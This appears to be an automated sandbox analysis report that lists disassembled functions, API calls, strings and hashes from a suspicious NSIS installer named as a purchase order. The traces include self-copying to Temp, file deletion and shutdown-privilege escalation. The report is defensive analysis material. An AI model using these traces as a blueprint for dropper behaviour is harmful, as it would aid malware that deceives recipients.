                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,?,?,?), ref: 0040372F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 00403737
                                        • DeleteFileW.KERNELBASE(1033,?,?,?,?), ref: 0040374B
                                          • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,?,?,?), ref: 004063FB
                                        • OleUninitialize.OLE32(?,?,?,?,?), ref: 00403816
                                        • ExitProcess.KERNEL32 ref: 00403837
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 0040384A
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403859
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403864
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000,?,?,?,?,?), ref: 00403870
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,?,?), ref: 0040388C
                                        • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?,?,?,?,?), ref: 004038E6
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\orders_PI 008-01.exe,0079F708,?,?,?,?,?), ref: 004038FA
                                        • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,?,?,?), ref: 00403927
                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 00403956
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                        • ExitWindowsEx.USER32(?,80040002), ref: 004039BA
                                        • ExitProcess.KERNEL32 ref: 004039DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens$C:\Users\user\Desktop$C:\Users\user\Desktop\orders_PI 008-01.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 3441113951-1000259359
                                        • Opcode ID: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                        • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                        • Opcode Fuzzy Hash: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                        • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E
                                        Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 385 405b00-405b26 call 405dcb 388 405b28-405b3a DeleteFileW 385->388 389 405b3f-405b46 385->389 390 405cbc-405cc0 388->390 391 405b48-405b4a 389->391 392 405b59-405b69 call 4063ee 389->392 393 405b50-405b53 391->393 394 405c6a-405c6f 391->394 400 405b78-405b79 call 405d0f 392->400 401 405b6b-405b76 lstrcatW 392->401 393->392 393->394 394->390 396 405c71-405c74 394->396 398 405c76-405c7c 396->398 399 405c7e-405c86 call 40674c 396->399 398->390 399->390 409 405c88-405c9c call 405cc3 call 405ab8 399->409 404 405b7e-405b82 400->404 401->404 405 405b84-405b8c 404->405 406 405b8e-405b94 lstrcatW 404->406 405->406 408 405b99-405bb5 lstrlenW FindFirstFileW 405->408 406->408 410 405bbb-405bc3 408->410 411 405c5f-405c63 408->411 425 405cb4-405cb7 call 405456 409->425 426 405c9e-405ca1 409->426 413 405be3-405bf7 call 4063ee 410->413 414 405bc5-405bcd 410->414 411->394 416 405c65 411->416 427 405bf9-405c01 413->427 428 405c0e-405c19 call 405ab8 413->428 417 405c42-405c52 FindNextFileW 414->417 418 405bcf-405bd7 414->418 416->394 417->410 424 405c58-405c59 FindClose 417->424 418->413 421 405bd9-405be1 418->421 421->413 421->417 424->411 425->390 426->398 431 405ca3-405cb2 call 405456 call 4061b4 426->431 427->417 432 405c03-405c07 call 405b00 427->432 436 405c3a-405c3d call 405456 428->436 437 405c1b-405c1e 428->437 431->390 439 405c0c 432->439 436->417 440 405c20-405c30 call 405456 call 4061b4 437->440 441 405c32-405c38 437->441 439->417 440->417 441->417
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                        • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?), ref: 00405B71
                                        • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?), ref: 00405B94
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?), ref: 00405B9A
                                        • FindFirstFileW.KERNELBASE(007A3F50,?,?,?,0040A014,?,007A3F50,?), ref: 00405BAA
                                        • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405C4A
                                        • FindClose.KERNEL32(00000000), ref: 00405C59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                        • API String ID: 2035342205-3776953501
                                        • Opcode ID: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                        • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                        • Opcode Fuzzy Hash: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                        • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                        Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 539 40324c-403263 540 403265 539->540 541 40326c-403275 539->541 540->541 542 403277 541->542 543 40327e-403283 541->543 542->543 544 403293-4032a0 call 403444 543->544 545 403285-40328e call 40345a 543->545 549 403432 544->549 550 4032a6-4032aa 544->550 545->544 551 403434-403435 549->551 552 4032b0-4032d6 GetTickCount 550->552 553 4033dd-4033df 550->553 556 40343d-403441 551->556 557 40343a 552->557 558 4032dc-4032e4 552->558 554 4033e1-4033e4 553->554 555 40341f-403422 553->555 554->557 561 4033e6 554->561 559 403424 555->559 560 403427-403430 call 403444 555->560 557->556 562 4032e6 558->562 563 4032e9-4032f7 call 403444 558->563 559->560 560->549 571 403437 560->571 565 4033e9-4033ef 561->565 562->563 563->549 573 4032fd-403306 563->573 568 4033f1 565->568 569 4033f3-403401 call 403444 565->569 568->569 569->549 576 403403-40340f call 405f96 569->576 571->557 575 40330c-40332c call 40693e 573->575 581 403332-403345 GetTickCount 575->581 582 4033d5-4033d7 575->582 585 403411-40341b 576->585 586 4033d9-4033db 576->586 583 403390-403392 581->583 584 403347-40334f 581->584 582->551 589 403394-403398 583->589 590 4033c9-4033cd 583->590 587 403351-403355 584->587 588 403357-403388 MulDiv wsprintfW call 405456 584->588 585->565 591 40341d 585->591 586->551 587->583 587->588 596 40338d 588->596 593 40339a-4033a1 call 405f96 589->593 594 4033af-4033ba 589->594 590->558 595 4033d3 590->595 591->557 599 4033a6-4033a8 593->599 598 4033bd-4033c1 594->598 595->557 596->583 598->575 600 4033c7 598->600 599->586 601 4033aa-4033ad 599->601 600->557 601->598
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                        • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                        • Opcode Fuzzy Hash: a56becbd4a8c381964fcf942c118294a751433144615ef02c1157a4186d243db
                                        • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                        Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,007A4F98,C:\,00405E14,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                        • FindClose.KERNEL32(00000000), ref: 00406763
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\
                                        • API String ID: 2295610775-3404278061
                                        • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                        • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                        • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                        • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC
                                        Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 403e6b-403e7d 140 403e83-403e89 139->140 141 403fbe-403fcd 139->141 140->141 144 403e8f-403e98 140->144 142 40401c-404031 141->142 143 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 141->143 146 404071-404076 call 404390 142->146 147 404033-404036 142->147 143->142 148 403e9a-403ea7 SetWindowPos 144->148 149 403ead-403eb0 144->149 161 40407b-404096 146->161 153 404038-404043 call 401389 147->153 154 404069-40406b 147->154 148->149 150 403eb2-403ec4 ShowWindow 149->150 151 403eca-403ed0 149->151 150->151 156 403ed2-403ee7 DestroyWindow 151->156 157 403eec-403eef 151->157 153->154 176 404045-404064 SendMessageW 153->176 154->146 160 404311 154->160 162 4042ee-4042f4 156->162 165 403ef1-403efd SetWindowLongW 157->165 166 403f02-403f08 157->166 164 404313-40431a 160->164 168 404098-40409a call 40140b 161->168 169 40409f-4040a5 161->169 162->160 171 4042f6-4042fc 162->171 165->164 174 403fab-403fb9 call 4043ab 166->174 175 403f0e-403f1f GetDlgItem 166->175 168->169 172 4040ab-4040b6 169->172 173 4042cf-4042e8 DestroyWindow EndDialog 169->173 171->160 177 4042fe-404307 ShowWindow 171->177 172->173 178 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 172->178 173->162 174->164 179 403f21-403f38 SendMessageW IsWindowEnabled 175->179 180 403f3e-403f41 175->180 176->164 177->160 209 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 178->209 210 40410b-404110 178->210 179->160 179->180 183 403f43-403f44 180->183 184 403f46-403f49 180->184 187 403f74-403f79 call 40431d 183->187 188 403f57-403f5c 184->188 189 403f4b-403f51 184->189 187->174 192 403f92-403fa5 SendMessageW 188->192 194 403f5e-403f64 188->194 189->192 193 403f53-403f55 189->193 192->174 193->187 195 403f66-403f6c call 40140b 194->195 196 403f7b-403f84 call 40140b 194->196 205 403f72 195->205 196->174 206 403f86-403f90 196->206 205->187 206->205 213 404151-404152 209->213 214 404154 209->214 210->209 215 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404186-404197 SendMessageW 215->216 217 404199 215->217 218 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 216->218 217->218 218->161 229 4041e4-4041e6 218->229 229->161 230 4041ec-4041f0 229->230 231 4041f2-4041f8 230->231 232 40420f-404223 DestroyWindow 230->232 231->160 233 4041fe-404204 231->233 232->162 234 404229-404256 CreateDialogParamW 232->234 233->161 235 40420a 233->235 234->162 236 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 4042b5-4042c8 ShowWindow call 404390 236->241 243 4042cd 241->243 243->162
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403EA7
                                        • ShowWindow.USER32(?), ref: 00403EC4
                                        • DestroyWindow.USER32 ref: 00403ED8
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                        • GetDlgItem.USER32(?,?), ref: 00403F15
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                        • GetDlgItem.USER32(?,?), ref: 00403FDE
                                        • GetDlgItem.USER32(?,?), ref: 00403FE8
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                        • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404053
                                        • GetDlgItem.USER32(?,?), ref: 004040F9
                                        • ShowWindow.USER32(00000000,?), ref: 0040411A
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                        • EnableWindow.USER32(?,?), ref: 00404147
                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415D
                                        • EnableMenuItem.USER32(00000000), ref: 00404164
                                        • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417C
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 0040418F
                                        • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                        • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                        • ShowWindow.USER32(?,?), ref: 00404301
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                        • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                        • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                        • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E
                                        Function 00403ABD Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 244 403abd-403ad5 call 4067e3 247 403ad7-403ae7 call 406335 244->247 248 403ae9-403b20 call 4062bc 244->248 256 403b43-403b6c call 403d93 call 405dcb 247->256 252 403b22-403b33 call 4062bc 248->252 253 403b38-403b3e lstrcatW 248->253 252->253 253->256 262 403b72-403b77 256->262 263 403bfe-403c06 call 405dcb 256->263 262->263 264 403b7d-403ba5 call 4062bc 262->264 269 403c14-403c39 LoadImageW 263->269 270 403c08-403c0f call 40642b 263->270 264->263 274 403ba7-403bab 264->274 272 403cba-403cc2 call 40140b 269->272 273 403c3b-403c6b RegisterClassW 269->273 270->269 287 403cc4-403cc7 272->287 288 403ccc-403cd7 call 403d93 272->288 275 403c71-403cb5 SystemParametersInfoW CreateWindowExW 273->275 276 403d89 273->276 278 403bbd-403bc9 lstrlenW 274->278 279 403bad-403bba call 405cf0 274->279 275->272 281 403d8b-403d92 276->281 282 403bf1-403bf9 call 405cc3 call 4063ee 278->282 283 403bcb-403bd9 lstrcmpiW 278->283 279->278 282->263 283->282 286 403bdb-403be5 GetFileAttributesW 283->286 290 403be7-403be9 286->290 291 403beb-403bec call 405d0f 286->291 287->281 297 403d60-403d68 call 405529 288->297 298 403cdd-403cf7 ShowWindow call 406773 288->298 290->282 290->291 291->282 303 403d82-403d84 call 40140b 297->303 304 403d6a-403d70 297->304 305 403d03-403d15 GetClassInfoW 298->305 306 403cf9-403cfe call 406773 298->306 303->276 304->287 309 403d76-403d7d call 40140b 304->309 307 403d17-403d27 GetClassInfoW RegisterClassW 305->307 308 403d2d-403d50 DialogBoxParamW call 40140b 305->308 306->305 307->308 314 403d55-403d5e call 403a0d 308->314 309->287 314->281
                                        APIs
                                          • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                          • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",00000000), ref: 00403B3E
                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,?,75573420), ref: 00403BBE
                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                        • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods), ref: 00403C25
                                          • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                        • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                        • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C7A
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                        • ShowWindow.USER32(?,00000000), ref: 00403CE5
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                        • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                        • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                        • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
